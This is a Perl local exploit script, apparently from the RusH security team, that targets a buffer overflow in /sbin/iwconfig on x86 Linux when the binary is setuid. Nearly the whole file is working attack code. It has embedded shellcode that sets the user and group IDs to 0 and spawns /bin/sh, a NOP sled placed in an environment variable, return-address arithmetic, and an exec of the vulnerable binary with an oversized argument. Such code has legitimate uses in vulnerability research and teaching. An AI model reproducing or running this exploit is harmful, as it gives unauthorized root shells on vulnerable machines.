#!/usr/bin/perl

# ******************************************************************
# r57iwconfig.pl
# /sbin/iwconfig local exploit
# by 1dt.w0lf // RusH security team // www.rsteam.ru
# just for fun
# tested on ASPlinux 9.0
# iwconfig not suid by-default on my b0x but if suid then...
# ******************************************************************
# for educations only ;)
# ******************************************************************


$shellcode ="\x31\xdb\x89\xd8\xb0\x17\xcd\x80" .
            "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" .
            "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
            "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
            "\x80\xe8\xdc\xff\xff\xff/bin/sh";

if(@ARGV != 1)
{
print "*** r57iwconfig.pl\n";
print "*** /sbin/iwconfig x86 linux local exploit\n";
print "*** usage: ./r57iwconfig.pl /path_to/iwconfig\n";
print "*** eg: ./r57iwconfig.pl /sbin/iwconfig\n";
exit();
}

$vuln = $ARGV[0];
$len = 96;
$nop = "\x90";
$ret = 0xbfffffff;
$offset = 0;

$ret2 = $ret + $offset - 5 - length($shellcode) - length($vuln);

print "path: $vuln\n";
print "offset: $offset\n";
print ("retaddr: 0x", sprintf('%lx',($ret2)),"\n");

$new_ret = pack('l', ($ret2));

for ($i=0; $i<$len; $i+=4)
 {
 $buffer .= $new_ret;
 }

for ($i=0; $i<10; $i++)
 {
 $buffer2 .= $nop;
 }

$buffer2 .= $shellcode;
local($ENV{'r57evilbuff'}) = $buffer2;
exec("$vuln $buffer");

# EOF